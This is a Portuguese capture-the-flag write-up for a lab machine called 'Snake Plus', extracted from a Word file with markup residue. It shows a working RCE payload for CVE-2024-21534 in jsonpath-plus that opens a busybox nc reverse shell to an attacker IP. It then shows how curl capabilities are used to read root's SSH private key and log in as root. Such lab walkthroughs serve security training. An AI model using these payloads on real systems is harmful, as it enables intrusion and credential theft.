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Snake Plus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Como primeiro passo, enumeramos as portas abertas na aplicação:</w:t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IP=&lt;IP_DA_MÁQUINA&gt;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rustscan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667250" cy="4029547"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="254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13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02954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yjnqs62egs3" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 1 - Scan de portas abertas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Observamos que as portas 22 e 80 estão abertas. Ao acessar a porta 80 vemos que ele redireciona para snake.hc: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05463" cy="3233921"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="254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2339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psy4t1z4o4x" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 2 - Acesso pelo hostname não é possível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Então, devemos adicionar esse hostname ao arquivo de hosts em “/etc/hosts”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000011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&lt;IP_DA_MÁQUINA&gt;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snake.hc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Agora, ao acessar a aplicação no navegador vemos a tela de um jogo Snake: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1025" cy="2776261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49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762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blos63abuv8" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 3 - Ao editar o arquivo de hosts a aplicação fica acessível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Ao escrever “bispo” e clicar em “Retrieve Score” você vai obter o valor 9999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2470" cy="3337163"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="254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470" cy="33371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4kcb4b6s3pdl" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 4 - Score do bispo é 9999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 ao escrever “ahnao” você vê o score -9999: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1925" cy="3182700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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4845" l="0" r="0" t="708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t5n943cs77x" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 5 - Score do ahnao é -9999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Ao clicar em start game, é possível jogar o jogo da Snake e salvar o seu score.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7175" cy="2913622"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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3184" l="0" r="0" t="913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9136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xwd4hgum0z4p" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 6 - Salvando o score para usuário hacker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Por enquanto, só temos controle sobre esse campo de nome do usuário.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Podemos fazer um fuzzing na aplicação para identificar outros possíveis caminhos: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feroxbuster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&lt;http://snake.hc/&gt;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--wordlist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/usr/share/wordlists/SecLists/Fuzzing/fuzz-Bo0oM.txt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--filter-status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848350" cy="2619375"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="254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16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19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vnndo12biadd" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 7 - Fuzzing na aplicação revela .git exposto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Observamos que há um .git exposto. Podemos usar o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git-dumper</w:t>
        </w:r>
      </w:hyperlink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para fazer o dump do código:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000024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git-dumper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&lt;http://snake.hc&gt;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695825" cy="3041516"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="254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4151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enp5m9v2cvbh" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 8 - Fazendo o dump do código-fonte usando git-dumper</w:t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6og7kwe27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Exploração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No arquivo game.js da pasta routes observamos que tanto na rota “save-score” quanto no “get-score” para ler os arquivos JSON, onde são salvas as pontuações, é utilizada a função JSONPath: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18175"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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45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1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hz39s41qsw4" w:id="12"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 9 - Localizada no código a Função JSONPath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subir para ler as importações de biblioteca, vemos que utiliza a biblioteca jsonpath-plus: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950" cy="116205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1etl27n2mtc" w:id="13"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 10 - Identificando a utilização da biblioteca jsonpath-plus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Ao pesquisar o nome dessa biblioteca no Google, é possível identificar que existe uma vulnerabilidade nessa biblioteca que permite a execução remota de código (RCE) (</w:t>
      </w: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CVE-2024-21534</w:t>
        </w:r>
      </w:hyperlink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 Para explorar a vulnerabilidade, precisamos manipular o parâmetro “query” que é passado para a função JSONPath.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7338" cy="723900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="254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52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72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m8ri4g2ck37r" w:id="14"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 11 - Query passada para a biblioteca vulnerável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Para alterar essa query primeiro precisamos fechar o parâmetro username e criar um novo parâmetro que chama o construtor para poder chamar a função child_process.execSync.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Após um tempo quebrando a cabeça, chegamos na seguinte payload (usando busybox nc como payload de reverse shell):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_$_root=[].constructor.constructor("this.process.mainModule.require('child_process').execSync('busybox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&lt;IP_MAQUINA_DE_ATAQUE&gt;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&lt;PORTA&gt;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bash')");@root();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@.username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No meu caso, a payload fica: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_$_root=[].constructor.constructor("this.process.mainModule.require('child_process').execSync('busybox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10.0.42.202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bash')");@root();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@.username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Subimos um listener para escutar:</w:t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-nvlp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Colocamos a payload e clicamos para salvar o score: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2308" cy="341336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308" cy="341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blhmwdddjmu0" w:id="15"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 12 - Salvando o score com a payload passada como nome de usuário ativa a execução remota de código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 assim recebemos a shell reversa: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250" cy="1200666"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="254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006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9i7s2ra5e2iq" w:id="16"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 13 - Recebendo a shell no listener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Fazemos o upgrade do terminal para Full TTY:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000040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TERM=xterm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Apertar Ctrl + Z e na máquina de ataque escrever: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Ao acessar a home do usuário snake, encontramos a flag de usuário.</w:t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123825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0a6l444g6hm" w:id="17"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 14 - Obtendo a flag de usuário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82y7svmy1a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Escalação de privilégios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Enumerando as formas de escalar privilégio para root, identificamos que o curl possui todas as</w:t>
      </w:r>
      <w:hyperlink r:id="rId25">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans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capabilities</w:t>
        </w:r>
      </w:hyperlink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habilitados, o que significa que ele sempre vai rodar como root:</w:t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getcap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090539" cy="707019"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="254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365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539" cy="7070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64m8s76tx6j" w:id="19"/>
      <w:bookmarkEnd w:id="19"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 15 - Enumerando as capabilities habilitadas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Assim, é possível ler arquivos usando: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file://&lt;PATH_DO_ARQUIVO&gt;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Podemos ler a flag de root diretamente, mas se quisermos obter shell como root, também é possível. Ao ler o arquivo .bash_history do root, vemos que foi criada uma chave SSH:</w:t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8475" cy="1390035"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="254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900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b2zak9889d7j" w:id="20"/>
      <w:bookmarkEnd w:id="20"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 16 - Lendo o arquivo .bash_history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Então podemos ler a chave SSH do root:</w:t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3388" cy="4624204"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="254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46242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p5pwujmbwhrw" w:id="21"/>
      <w:bookmarkEnd w:id="21"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 17 - Lendo a chave SSH do root com curl</w:t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 isso, podemos copiar seu conteúdo, salvar em um arquivo na máquina de ataque com o nome id_rsa e atribuir as permissões adequadas com:</w:t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 isso, podemos nos conectar por SSH como root e pegar a última flag:</w:t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root@snake.hc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000059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 root.txt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129088" cy="4193604"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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41936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1tdoijpopk2m" w:id="22"/>
      <w:bookmarkEnd w:id="22"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 18 - Obtendo a flag de root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</w:t>
      <w:tab/>
      <w:t xml:space="preserve">          </w:t>
      <w:tab/>
      <w:tab/>
      <w:tab/>
      <w:t xml:space="preserve">                        </w:t>
      <w:tab/>
      <w:t xml:space="preserve">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>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_qnw61nncct6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Snake Plus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rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans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IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      <w:i w:val="1"/>
      <w:iCs w:val="1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upwind.io/feed/critical-rce-vulnerability-in-jsonpath-plus-cve-2024-21534" TargetMode="External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1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www.thehacker.recipes/infra/privilege-escalation/unix/capabilities" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.thehacker.recipes/infra/privilege-escalation/unix/capabilities" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6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/224" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4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1.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/arthaud/git-dumper" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/arthaud/git-dumper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